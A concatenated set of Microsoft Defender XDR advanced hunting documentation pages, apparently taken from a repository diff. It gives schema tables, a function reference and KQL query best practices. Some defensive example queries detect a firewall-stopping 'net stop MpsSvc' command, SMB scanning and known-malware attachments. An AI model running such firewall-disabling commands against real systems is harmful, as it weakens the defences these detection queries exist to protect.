-| `RemoteUrl` | `string` | URL or fully qualified domain name (FQDN) that was being connected to |
-| `AccountName` | `string` | User name of the account |
-| `AccountDomain` | `string` | Domain of the account |
-| `AccountSid` | `string` | Security Identifier (SID) of the account |
-| `AccountObjectId` | `string` | Unique identifier for the account in Microsoft Entra ID |
-| `AccountUpn` | `string` | User principal name (UPN) of the account |
-| `DeviceId` | `string` | Unique identifier for the device in the service |
-| `DeviceName` | `string` | Fully qualified domain name (FQDN) of the device |
-| `LocalIP` | `string` | IP address assigned to the local device used during communication |
-| `NetworkMessageId` | `string` | Unique identifier for the email, generated by Office 365 |
-| `EmailSubject` | `string` | Subject of the email |
-| `Application` | `string` | Application that performed the recorded action |
-| `ApplicationId` | `int` | Unique identifier for the application |
-| `OAuthApplicationId` | `string` | Unique identifier of the third-party OAuth application |
-| `ProcessCommandLine` | `string` | Command line used to create the new process |
-| `RegistryKey` |`string` | Registry key that the recorded action was applied to |
-| `RegistryValueName` |`string` | Name of the registry value that the recorded action was applied to |
-| `RegistryValueData` |`string` | Data of the registry value that the recorded action was applied to |
-| `AdditionalFields` | `string` | Additional information about the entity or event |
-| `Severity` | `string` | Indicates the potential impact (high, medium, or low) of the threat indicator or breach activity identified by the alert |
-| `CloudResource` | `string` | Cloud resource name |
-| `CloudPlatform` | `string` | The cloud platform that the resource belongs to, can be Azure, Amazon Web Services, or Google Cloud Platform |
-| `ResourceType` | `string` | Type of cloud resource |
-| `ResourceID` | `string` | Unique identifier of the cloud resource accessed |
-| `SubscriptionId` | `string` | Unique identifier of the cloud service subscription |
-
-## Related topics
-- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Alertinfo Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-alertinfo-table.md
- Title: AlertInfo table in the advanced hunting schema
-description: Learn about alert generation events in the AlertInfo table of the advanced hunting schema
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 04/03/2024--
-# AlertInfo
---
-**Applies to:**
-- Microsoft Defender XDR--
-## Get access
-To use advanced hunting or other [Microsoft Defender XDR](microsoft-365-defender.md) capabilities, you need an appropriate role in Microsoft Entra ID. [Read about required roles and permissions for advanced hunting](custom-roles.md).
-
-Also, your access to endpoint data is determined by role-based access control (RBAC) settings in Microsoft Defender for Endpoint. [Read about managing access to Microsoft Defender XDR](m365d-permissions.md).
-
-## AlertInfo
-
-The `AlertInfo` table in the [advanced hunting](advanced-hunting-overview.md) schema contains information about alerts from Microsoft Defender for Endpoint, Microsoft Defender for Office 365, Microsoft Defender for Cloud Apps, and Microsoft Defender for Identity. Use this reference to construct queries that return information from this table.
-
-For information on other tables in the advanced hunting schema, [see the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `Timestamp` | `datetime` | Date and time when the record was generated |
-| `AlertId` | `string` | Unique identifier for the alert |
-| `Title` | `string` | Title of the alert |
-| `Category` | `string` | Type of threat indicator or breach activity identified by the alert |
-| `Severity` | `string` | Indicates the potential impact (high, medium, or low) of the threat indicator or breach activity identified by the alert |
-| `ServiceSource` | `string` | Product or service that provided the alert information |
-| `DetectionSource` | `string` | Detection technology or sensor that identified the notable component or activity |
-| `AttackTechniques` | `string` | MITRE ATT&CK techniques associated with the activity that triggered the alert |
-
-## Related topics
-- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Assignedipaddresses Function https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-assignedipaddresses-function.md
- Title: AssignedIPAddresses() function in advanced hunting for Microsoft Defender XDR
-description: Learn how to use the AssignedIPAddresses() function to get the latest IP addresses assigned to a device
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 04/03/2024--
-# AssignedIPAddresses()
---
-**Applies to:**
-- Microsoft Defender XDR-
-Use the `AssignedIPAddresses()` function in your [advanced hunting](advanced-hunting-overview.md) queries to quickly obtain the latest IP addresses that have been assigned to a device. If you specify a timestamp argument, this function obtains the most recent IP addresses at the specified time.
-
-This function returns a table with the following columns:
-
-| Column | Data type | Description |
-||-|-|
-| `Timestamp` | `datetime` | Latest time when the device was observed using the IP address |
-| `IPAddress` | `string` | IP address used by the device |
-| `IPType` | `string` | Indicates whether the IP address is a public or private address |
-| `NetworkAdapterType` | `int` | Network adapter type used by the device that has been assigned the IP address. For the possible values, refer to [this enumeration](/dotnet/api/system.net.networkinformation.networkinterfacetype) |
-| `ConnectedNetworks` | `int` | Networks that the adapter with the assigned IP address is connected to. Each JSON array contains the network name, category (public, private, or domain), a description, and a flag indicating if it's connected publicly to the internet |
-
-## Syntax
-
-```kusto
-AssignedIPAddresses(x, y)
-```
-
-## Arguments
--- **x**ΓÇö`DeviceId` or `DeviceName` value identifying the device-- **y**ΓÇö`Timestamp` (datetime) value instructing the function to obtain the most recent assigned IP addresses from a specific time. If not specified, the function returns the latest IP addresses.-
-## Examples
-
-### Get the list of IP addresses used by a device 24 hours ago
-
-```kusto
-AssignedIPAddresses('example-device-name', ago(1d))
-```
-
-### Get IP addresses used by a device and find devices communicating with it
-This query uses the `AssignedIPAddresses()` function to get assigned IP addresses for the device (`example-device-name`) on or before a specific date (`example-date`). It then uses the IP addresses to find connections to the device initiated by other devices.
-
-```kusto
-let Date = datetime(example-date);
-let DeviceName = "example-device-name";
-// List IP addresses used on or before the specified date
-AssignedIPAddresses(DeviceName, Date)
-| project DeviceName, IPAddress, AssignedTime = Timestamp
-// Get all network events on devices with the assigned IP addresses as the destination addresses
-| join kind=inner DeviceNetworkEvents on $left.IPAddress == $right.RemoteIP
-// Get only network events around the time the IP address was assigned
-| where Timestamp between ((AssignedTime - 1h) .. (AssignedTime + 1h))
-```
-
-## Related topics
-- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Understand the schema](advanced-hunting-schema-tables.md)
security Advanced Hunting Behaviorentities Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-behaviorentities-table.md
- Title: BehaviorEntities table in the advanced hunting schema
-description: Learn about behaviors in the BehaviorEntities table of the advanced hunting schema
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 12/29/2023--
-# BehaviorEntities
--
-**Applies to:**
-- Microsoft Defender XDR-
-The `BehaviorEntities` table in the [advanced hunting](advanced-hunting-overview.md) schema contains information about behaviors in Microsoft Defender for Cloud Apps. Use this reference to construct queries that return information from this table.
-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-Behaviors are a type of data in Microsoft Defender XDR based on one or more raw events. Behaviors provide contextual insight into events and can, but not necessarily, indicate malicious activity. [Read more about behaviors](/defender-cloud-apps/behaviors)
-
-For information on other tables in the advanced hunting schema, [see the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `Timestamp` | `datetime` | Date and time when the record was generated |
-| `BehaviorId` | `string` | Unique identifier for the behavior|
-| `ActionType` | `string` | Type of behavior |
-| `Categories` | `string` | Type of threat indicator or breach activity identified by the behavior|
-| `ServiceSource` | `string` | Product or service that identified the behavior |
-| `DetectionSource` | `string` | Detection technology or sensor that identified the notable component or activity |
-| `DataSources` | `string` | Products or services that provided information for the behavior |
-| `EntityType` | `string` | Type of object, such as a file, a process, a device, or a user |
-| `EntityRole` | `string` | Indicates whether the entity is impacted or merely related |
-| `DetailedEntityRole` | `string` | The roles of the entity in the behavior|
-| `FileName` | `string` | Name of the file that the behavior applies to|
-| `FolderPath` | `string` | Folder containing the file that the behavior applies to|
-| `SHA1` | `string` | SHA-1 of the file that the behavior applies to|
-| `SHA256` | `string` | SHA-256 of the file that the behavior applies to|
-| `FileSize` | `long` | Size, in bytes, of the file that the behavior applies to |
-|`ThreatFamily`|`string`| Malware family that the suspicious or malicious file or process has been classified under |
-|`RemoteIP`|`string` |IP address that was being connected to |
-|`RemoteUrl`|`string` |URL or fully qualified domain name (FQDN) that was being connected to |
-|`AccountName`|`string` |User name of the account |
-|`AccountDomain`|`string` |Domain of the account |
-|`AccountSid`|`string` |Security Identifier (SID) of the account |
-| `AccountObjectId` | `string` | Unique identifier for the account in Microsoft Entra ID |
-| `AccountUpn` | `string` | User principal name (UPN) of the account |
-| `DeviceId` | `string` | Unique identifier for the device in the service |
-|`DeviceName`|`string` | Fully qualified domain name (FQDN) of the device |
-|`LocalIP`|`string` | IP address assigned to the local device used during communication |
-|`NetworkMessageId`|`string`| Unique identifier for the email, generated by Office 365 |
-|`EmailSubject`|`string`| Subject of the email |
-|`EmailClusterId`|`string`| Identifier for the group of similar emails clustered based on heuristic analysis of their contents |
-|`Application`|`string`| Application that performed the recorded action |
-|`ApplicationId`|`int`| Unique identifier for the application |
-|`OAuthApplicationId`|`string`| Unique identifier of the third-party OAuth application |
-|`ProcessCommandLine`|`string`| Command line used to create the new process |
-|`RegistryKey`|`string`| Registry key that the recorded action was applied to |
-|`RegistryValueName`|`string`| Name of the registry value that the recorded action was applied to |
-|`RegistryValueData`|`string`| Data of the registry value that the recorded action was applied to |
-| `AdditionalFields` | `string` | Additional information about the behavior|
-
-## Related topics
--- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Behaviorinfo Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-behaviorinfo-table.md
- Title: BehaviorInfo table in the advanced hunting schema
-description: Learn about alert generation events in the BehaviorInfo table of the advanced hunting schema
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 12/29/2023--
-# BehaviorInfo
---
-**Applies to:**
-- Microsoft Defender XDR----
-The `BehaviorInfo` table in the [advanced hunting](advanced-hunting-overview.md) schema contains information about alerts from Microsoft Defender for Cloud Apps. Use this reference to construct queries that return information from this table.
-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-Behaviors are a type of data in Microsoft Defender XDR based on one or more raw events. Behaviors provide contextual insight into events and can, but not necessarily, indicate malicious activity. [Read more about behaviors](/defender-cloud-apps/behaviors)
-
-For information on other tables in the advanced hunting schema, [see the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `Timestamp` | `datetime` | Date and time when the record was generated |
-| `BehaviorId` | `string` | Unique identifier for the behavior|
-| `ActionType` | `string` | Type of behavior |
-| `Description` | `string` | Description of the behavior |
-| `Categories` | `string` | Type of threat indicator or breach activity identified by the behavior|
-| `AttackTechniques` | `string` | MITRE ATT&CK techniques associated with the activity that triggered the behavior |
-| `ServiceSource` | `string` | Product or service that identified the behavior |
-| `DetectionSource` | `string` | Detection technology or sensor that identified the notable component or activity |
-| `DataSources` | `string` | Products or services that provided information for the behavior |
-| `DeviceId` | `string` | Unique identifier for the device in the service |
-| `AccountUpn` | `string` | User principal name (UPN) of the account |
-| `AccountObjectId` | `string` | Unique identifier for the account in Microsoft Entra ID |
-| `StartTime` | `datetime` | Date and time of the first activity related to the behavior|
-| `EndTime` | `datetime` | Date and time of the last activity related to the behavior|
-| `AdditionalFields` | `string` | Additional information about the behavior|
---
-## Related topics
-- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Best Practices https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-best-practices.md
- Title: Advanced hunting query best practices in Microsoft Defender XDR
-description: Learn how to construct fast, efficient, and error-free threat hunting queries with advanced hunting
--
- - NOCSH
------ m365-security-- tier2- Previously updated : 02/16/2024--
-# Advanced hunting query best practices
---
-**Applies to:**
-- Microsoft Defender XDR-
-Apply these recommendations to get results faster and avoid timeouts while running complex queries. For more guidance on improving query performance, read [Kusto query best practices](/azure/kusto/query/best-practices).
-
-## Understand CPU resource quotas
-Depending on its size, each tenant has access to a set amount of CPU resources allocated for running advanced hunting queries. For detailed information about various usage parameters, [read about advanced hunting quotas and usage parameters](advanced-hunting-limits.md).
-
-After running your query, you can see the execution time and its resource usage (Low, Medium, High). High indicates that the query took more resources to run and could be improved to return results more efficiently.
--
-Customers who run multiple queries regularly should track consumption and apply the optimization guidance in this article to minimize disruption resulting from exceeding quotas or usage parameters.
-
-Watch [Optimizing KQL queries](https://www.youtube.com/watch?v=ceYvRuPp5D8) to see some of the most common ways to improve your queries.
-
-## General optimization tips
--- **Size new queries**ΓÇöIf you suspect that a query will return a large result set, assess it first using the [count operator](/azure/data-explorer/kusto/query/countoperator). Use [limit](/azure/data-explorer/kusto/query/limitoperator) or its synonym `take` to avoid large result sets.-- **Apply filters early**ΓÇöApply time filters and other filters to reduce the data set, especially before using transformation and parsing functions, such as [substring()](/azure/data-explorer/kusto/query/substringfunction), [replace()](/azure/data-explorer/kusto/query/replacefunction), [trim()](/azure/data-explorer/kusto/query/trimfunction), [toupper()](/azure/data-explorer/kusto/query/toupperfunction), or [parse_json()](/azure/data-explorer/kusto/query/parsejsonfunction). In the example below, the parsing function [extractjson()](/azure/data-explorer/kusto/query/extractjsonfunction) is used after filtering operators have reduced the number of records.-
- ```kusto
- DeviceEvents
- | where Timestamp > ago(1d)
- | where ActionType == "UsbDriveMount"
- | where DeviceName == "user-desktop.domain.com"
- | extend DriveLetter = extractjson("$.DriveLetter", AdditionalFields)
- ```
--- **Has beats contains**ΓÇöTo avoid searching substrings within words unnecessarily, use the `has` operator instead of `contains`. [Learn about string operators](/azure/data-explorer/kusto/query/datatypes-string-operators)-- **Look in specific columns**ΓÇöLook in a specific column rather than running full text searches across all columns. Don't use `*` to check all columns.-- **Case-sensitive for speed**ΓÇöCase-sensitive searches are more specific and generally more performant. Names of case-sensitive [string operators](/azure/data-explorer/kusto/query/datatypes-string-operators), such as `has_cs` and `contains_cs`, generally end with `_cs`. You can also use the case-sensitive equals operator `==` instead of `=~`.-- **Parse, don't extract**ΓÇöWhenever possible, use the [parse operator](/azure/data-explorer/kusto/query/parseoperator) or a parsing function like [parse_json()](/azure/data-explorer/kusto/query/parsejsonfunction). Avoid the `matches regex` string operator or the [extract() function](/azure/data-explorer/kusto/query/extractfunction), both of which use regular expression. Reserve the use of regular expression for more complex scenarios. [Read more about parsing functions](#parse-strings)-- **Filter tables not expressions**ΓÇöDon't filter on a calculated column if you can filter on a table column.-- **No three-character terms**ΓÇöAvoid comparing or filtering using terms with three characters or fewer. These terms are not indexed and matching them will require more resources.-- **Project selectively**ΓÇöMake your results easier to understand by projecting only the columns you need. Projecting specific columns prior to running [join](/azure/data-explorer/kusto/query/joinoperator) or similar operations also helps improve performance.---
-## Optimize the `join` operator
-The [join operator](/azure/data-explorer/kusto/query/joinoperator) merges rows from two tables by matching values in specified columns. Apply these tips to optimize queries that use this operator.
--- **Smaller table to your left**ΓÇöThe `join` operator matches records in the table on the left side of your join statement to records on the right. By having the smaller table on the left, fewer records will need to be matched, thus speeding up the query.-
- In the table below, we reduce the left table `DeviceLogonEvents` to cover only three specific devices before joining it with `IdentityLogonEvents` by account SIDs.
-
- ```kusto
- DeviceLogonEvents
- | where DeviceName in ("device-1.domain.com", "device-2.domain.com", "device-3.domain.com")
- | where ActionType == "LogonFailed"
- | join
- (IdentityLogonEvents
- | where ActionType == "LogonFailed"
- | where Protocol == "Kerberos")
- on AccountSid
- ```
--- **Use the inner-join flavor**ΓÇöThe default [join flavor](/azure/data-explorer/kusto/query/joinoperator#join-flavors) or the [innerunique-join](/azure/data-explorer/kusto/query/joinoperator?pivots=azuredataexplorer#innerunique-join-flavor) deduplicates rows in the left table by the join key before returning a row for each match to the right table. If the left table has multiple rows with the same value for the `join` key, those rows will be deduplicated to leave a single random row for each unique value.-
- This default behavior can leave out important information from the left table that can provide useful insight. For example, the query below will only show one email containing a particular attachment, even if that same attachment was sent using multiple emails messages:
-
- ```kusto
- EmailAttachmentInfo
- | where Timestamp > ago(1h)
- | where Subject == "Document Attachment" and FileName == "Document.pdf"
- | join (DeviceFileEvents | where Timestamp > ago(1h)) on SHA256
- ```
-
- To address this limitation, we apply the [inner-join](/azure/data-explorer/kusto/query/joinoperator?pivots=azuredataexplorer#inner-join-flavor) flavor by specifying `kind=inner` to show all rows in the left table with matching values in the right:
-
- ```kusto
- EmailAttachmentInfo
- | where Timestamp > ago(1h)
- | where Subject == "Document Attachment" and FileName == "Document.pdf"
- | join kind=inner (DeviceFileEvents | where Timestamp > ago(1h)) on SHA256
- ```
-- **Join records from a time window**ΓÇöWhen investigating security events, analysts look for related events that occur around the same time period. Applying the same approach when using `join` also benefits performance by reducing the number of records to check.-
- The query below checks for logon events within 30 minutes of receiving a malicious file:
-
- ```kusto
- EmailEvents
- | where Timestamp > ago(7d)
- | where ThreatTypes has "Malware"
- | project EmailReceivedTime = Timestamp, Subject, SenderFromAddress, AccountName = tostring(split(RecipientEmailAddress, "@")[0])
- | join (
- DeviceLogonEvents
- | where Timestamp > ago(7d)
- | project LogonTime = Timestamp, AccountName, DeviceName
- ) on AccountName
- | where (LogonTime - EmailReceivedTime) between (0min .. 30min)
- ```
-- **Apply time filters on both sides**ΓÇöEven if you're not investigating a specific time window, applying time filters on both the left and right tables can reduce the number of records to check and improve `join` performance. The query below applies `Timestamp > ago(1h)` to both tables so that it joins only records from the past hour:-
- ```kusto
- EmailAttachmentInfo
- | where Timestamp > ago(1h)
- | where Subject == "Document Attachment" and FileName == "Document.pdf"
- | join kind=inner (DeviceFileEvents | where Timestamp > ago(1h)) on SHA256
- ```
--- **Use hints for performance**ΓÇöUse hints with the `join` operator to instruct the backend to distribute load when running resource-intensive operations. [Learn more about join hints](/azure/data-explorer/kusto/query/joinoperator#join-hints)-
- For example, the **[shuffle hint](/azure/data-explorer/kusto/query/shufflequery)** helps improve query performance when joining tables using a key with high cardinalityΓÇöa key with many unique valuesΓÇösuch as the `AccountObjectId` in the query below:
-
- ```kusto
- IdentityInfo
- | where JobTitle == "CONSULTANT"
- | join hint.shufflekey = AccountObjectId
- (IdentityDirectoryEvents
- | where Application == "Active Directory"
- | where ActionType == "Private data retrieval")
- on AccountObjectId
- ```
-
- The **[broadcast hint](/azure/data-explorer/kusto/query/broadcastjoin)** helps when the left table is small (up to 100,000 records) and the right table is extremely large. For example, the query below is trying to join a few emails that have specific subjects with _all_ messages containing links in the `EmailUrlInfo` table:
-
- ```kusto
- EmailEvents
- | where Subject in ("Warning: Update your credentials now", "Action required: Update your credentials now")
- | join hint.strategy = broadcast EmailUrlInfo on NetworkMessageId
- ```
-
-## Optimize the `summarize` operator
-The [summarize operator](/azure/data-explorer/kusto/query/summarizeoperator) aggregates the contents of a table. Apply these tips to optimize queries that use this operator.
--- **Find distinct values**ΓÇöIn general, use `summarize` to find distinct values that can be repetitive. It can be unnecessary to use it to aggregate columns that don't have repetitive values.-
- While a single email can be part of multiple events, the example below is _not_ an efficient use of `summarize` because a network message ID for an individual email always comes with a unique sender address.
-
- ```kusto
- EmailEvents
- | where Timestamp > ago(1h)
- | summarize by NetworkMessageId, SenderFromAddress
- ```
- The `summarize` operator can be easily replaced with `project`, yielding potentially the same results while consuming fewer resources:
-
- ```kusto
- EmailEvents
- | where Timestamp > ago(1h)
- | project NetworkMessageId, SenderFromAddress
- ```
- The following example is a more efficient use of `summarize` because there can be multiple distinct instances of a sender address sending email to the same recipient address. Such combinations are less distinct and are likely to have duplicates.
-
- ```kusto
- EmailEvents
- | where Timestamp > ago(1h)
- | summarize by SenderFromAddress, RecipientEmailAddress
- ```
--- **Shuffle the query**ΓÇöWhile `summarize` is best used in columns with repetitive values, the same columns can also have _high cardinality_ or large numbers of unique values. Like the `join` operator, you can also apply the [shuffle hint](/azure/data-explorer/kusto/query/shufflequery) with `summarize` to distribute processing load and potentially improve performance when operating on columns with high cardinality.-
- The query below uses `summarize` to count distinct recipient email address, which can run in the hundreds of thousands in large organizations. To improve performance, it incorporates `hint.shufflekey`:
-
- ```kusto
- EmailEvents
- | where Timestamp > ago(1h)
- | summarize hint.shufflekey = RecipientEmailAddress count() by Subject, RecipientEmailAddress
- ```
---
-## Query scenarios
-
-### Identify unique processes with process IDs
-
-Process IDs (PIDs) are recycled in Windows and reused for new processes. On their own, they can't serve as unique identifiers for specific processes.
-
-To get a unique identifier for a process on a specific machine, use the process ID together with the process creation time. When you join or summarize data around processes, include columns for the machine identifier (either `DeviceId` or `DeviceName`), the process ID (`ProcessId` or `InitiatingProcessId`), and the process creation time (`ProcessCreationTime` or `InitiatingProcessCreationTime`)
-
-The following example query finds processes that access more than 10 IP addresses over port 445 (SMB), possibly scanning for file shares.
-
-Example query:
-
-```kusto
-DeviceNetworkEvents
-| where RemotePort == 445 and Timestamp > ago(12h) and InitiatingProcessId !in (0, 4)
-| summarize RemoteIPCount=dcount(RemoteIP) by DeviceName, InitiatingProcessId, InitiatingProcessCreationTime, InitiatingProcessFileName
-| where RemoteIPCount > 10
-```
-
-The query summarizes by both `InitiatingProcessId` and `InitiatingProcessCreationTime` so that it looks at a single process, without mixing multiple processes with the same process ID.
-
-### Query command lines
-There are numerous ways to construct a command line to accomplish a task. For example, an attacker could reference an image file without a path, without a file extension, using environment variables, or with quotes. The attacker could also change the order of parameters or add multiple quotes and spaces.
-
-To create more durable queries around command lines, apply the following practices:
--- Identify the known processes (such as *net.exe* or *psexec.exe*) by matching on the file name fields, instead of filtering on the command-line itself.-- Parse command-line sections using the [parse_command_line() function](/azure/data-explorer/kusto/query/parse-command-line)-- When querying for command-line arguments, don't look for an exact match on multiple unrelated arguments in a certain order. Instead, use regular expressions or use multiple separate contains operators.-- Use case insensitive matches. For example, use `=~`, `in~`, and `contains` instead of `==`, `in`, and `contains_cs`.-- To mitigate command-line obfuscation techniques, consider removing quotes, replacing commas with spaces, and replacing multiple consecutive spaces with a single space. There are more complex obfuscation techniques that require other approaches, but these tweaks can help address common ones.-
-The following examples show various ways to construct a query that looks for the file *net.exe* to stop the firewall service "MpsSvc":
-
-```kusto
-// Non-durable query - do not use
-DeviceProcessEvents
-| where ProcessCommandLine == "net stop MpsSvc"
-| limit 10
-
-// Better query - filters on file name, does case-insensitive matches
-DeviceProcessEvents
-| where Timestamp > ago(7d) and FileName in~ ("net.exe", "net1.exe") and ProcessCommandLine contains "stop" and ProcessCommandLine contains "MpsSvc"
-
-// Best query also ignores quotes
-DeviceProcessEvents
-| where Timestamp > ago(7d) and FileName in~ ("net.exe", "net1.exe")
-| extend CanonicalCommandLine=replace("\"", "", ProcessCommandLine)
-| where CanonicalCommandLine contains "stop" and CanonicalCommandLine contains "MpsSvc"
-```
-
-### Ingest data from external sources
-To incorporate long lists or large tables into your query, use the [externaldata operator](/azure/data-explorer/kusto/query/externaldata-operator) to ingest data from a specified URI. You can get data from files in TXT, CSV, JSON, or [other formats](/azure/data-explorer/ingestion-supported-formats). The example below shows how you can utilize the extensive list of malware SHA-256 hashes provided by MalwareBazaar (abuse.ch) to check attachments on emails:
-
-```kusto
-let abuse_sha256 = (externaldata(sha256_hash: string)
-[@"https://bazaar.abuse.ch/export/txt/sha256/recent/"]
-with (format="txt"))
-| where sha256_hash !startswith "#"
-| project sha256_hash;
-abuse_sha256
-| join (EmailAttachmentInfo
-| where Timestamp > ago(1d)
-) on $left.sha256_hash == $right.SHA256
-| project Timestamp,SenderFromAddress,RecipientEmailAddress,FileName,FileType,
-SHA256,ThreatTypes,DetectionMethods
-```
-
-### Parse strings
-There are various functions you can use to efficiently handle strings that need parsing or conversion.
-
-| String | Function | Usage example |
-|--|--|--|
-| Command-lines | [parse_command_line()](/azure/data-explorer/kusto/query/parse-command-line) | Extract the command and all arguments. |
-| Paths | [parse_path()](/azure/data-explorer/kusto/query/parsepathfunction) | Extract the sections of a file or folder path. |
-| Version numbers | [parse_version()](/azure/data-explorer/kusto/query/parse-versionfunction) | Deconstruct a version number with up to four sections and up to eight characters per section. Use the parsed data to compare version age. |
-| IPv4 addresses | [parse_ipv4()](/azure/data-explorer/kusto/query/parse-ipv4function) | Convert an IPv4 address to a long integer. To compare IPv4 addresses without converting them, use [ipv4_compare()](/azure/data-explorer/kusto/query/ipv4-comparefunction). |
-| IPv6 addresses | [parse_ipv6()](/azure/data-explorer/kusto/query/parse-ipv6function) | Convert an IPv4 or IPv6 address to the canonical IPv6 notation. To compare IPv6 addresses, use [ipv6_compare()](/azure/data-explorer/kusto/query/ipv6-comparefunction). |
-
-To learn about all supported parsing functions, [read about Kusto string functions](/azure/data-explorer/kusto/query/scalarfunctions#string-functions).
-
-> [!NOTE]
-> Some tables in this article might not be available in Microsoft Defender for Endpoint. [Turn on Microsoft Defender XDR](m365d-enable.md) to hunt for threats using more data sources. You can move your advanced hunting workflows from Microsoft Defender for Endpoint to Microsoft Defender XDR by following the steps in [Migrate advanced hunting queries from Microsoft Defender for Endpoint](advanced-hunting-migrate-from-mde.md).
-
-## Related topics
--- [Kusto query language documentation](/azure/data-explorer/kusto/query/)-- [Quotas and usage parameters](advanced-hunting-limits.md)-- [Handle advanced hunting errors](advanced-hunting-errors.md)-- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)
security Advanced Hunting Cloudappevents Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-cloudappevents-table.md
- Title: CloudAppEvents table in the advanced hunting schema
-description: Learn about events from cloud apps and services in the CloudAppEvents table of the advanced hunting schema
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 12/29/2023--
-# CloudAppEvents
--
-**Applies to:**
-- Microsoft Defender XDR-
-The `CloudAppEvents` table in the [advanced hunting](advanced-hunting-overview.md) schema contains information about events involving accounts and objects in Office 365 and other [cloud apps and services](#apps-and-services-covered). Use this reference to construct queries that return information from this table.
--
-For information on other tables in the advanced hunting schema, [see the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `Timestamp` | `datetime` | Date and time when the event was recorded |
-| `ActionType` | `string` | Type of activity that triggered the event |
-| `Application` | `string` | Application that performed the recorded action |
-| `ApplicationId` | `int` | Unique identifier for the application |
-| `AppInstanceId` | `int` | Unique identifier for the instance of an application. To convert this to Microsoft Defender for Cloud Apps App-connector-ID use `CloudAppEvents|distinct ApplicationId,AppInstanceId,binary_or(binary_shift_left(AppInstanceId,20),ApplicationId)|order by ApplicationId,AppInstanceId` |
-| `AccountObjectId` | `string` | Unique identifier for the account in Microsoft Entra ID |
-| `AccountId` | `string` | An identifier for the account as found by Microsoft Defender for Cloud Apps. Could be Microsoft Entra ID, user principal name, or other identifiers. |
-| `AccountDisplayName` | `string` | Name displayed in the address book entry for the account user. This is usually a combination of the given name, middle initial, and surname of the user. |
-| `IsAdminOperation` | `bool` | Indicates whether the activity was performed by an administrator |
-| `DeviceType` | `string` | Type of device based on purpose and functionality, such as network device, workstation, server, mobile, gaming console, or printer |
-| `OSPlatform` | `string` | Platform of the operating system running on the device. This column indicates specific operating systems, including variations within the same family, such as Windows 11, Windows 10 and Windows 7. |
-| `IPAddress` | `string` | IP address assigned to the device during communication |
-| `IsAnonymousProxy` | `boolean` | Indicates whether the IP address belongs to a known anonymous proxy |
-| `CountryCode` | `string` | Two-letter code indicating the country where the client IP address is geolocated |
-| `City` | `string` | City where the client IP address is geolocated |
-| `Isp` | `string` | Internet service provider associated with the IP address |
-| `UserAgent` | `string` | User agent information from the web browser or other client application |
-| `ActivityType` | `string` | Type of activity that triggered the event |
-| `ActivityObjects` | `dynamic` | List of objects, such as files or folders, that were involved in the recorded activity |
-| `ObjectName` | `string` | Name of the object that the recorded action was applied to |
-| `ObjectType` | `string` | Type of object, such as a file or a folder, that the recorded action was applied to |
-| `ObjectId` | `string` | Unique identifier of the object that the recorded action was applied to |
-| `ReportId` | `string` | Unique identifier for the event |
-| `AccountType` | `string` | Type of user account, indicating its general role and access levels, such as Regular, System, Admin, Application |
-| `IsExternalUser` | `boolean` | Indicates whether a user inside the network doesn't belong to the organization's domain |
-| `IsImpersonated` | `boolean` | Indicates whether the activity was performed by one user for another (impersonated) user |
-| `IPTags` | `dynamic` | Customer-defined information applied to specific IP addresses and IP address ranges |
-| `IPCategory` | `string` | Additional information about the IP address |
-| `UserAgentTags` | `dynamic` | More information provided by Microsoft Defender for Cloud Apps in a tag in the user agent field. Can have any of the following values: Native client, Outdated browser, Outdated operating system, Robot |
-| `RawEventData` | `dynamic` | Raw event information from the source application or service in JSON format |
-| `AdditionalFields` | `dynamic` | Additional information about the entity or event |
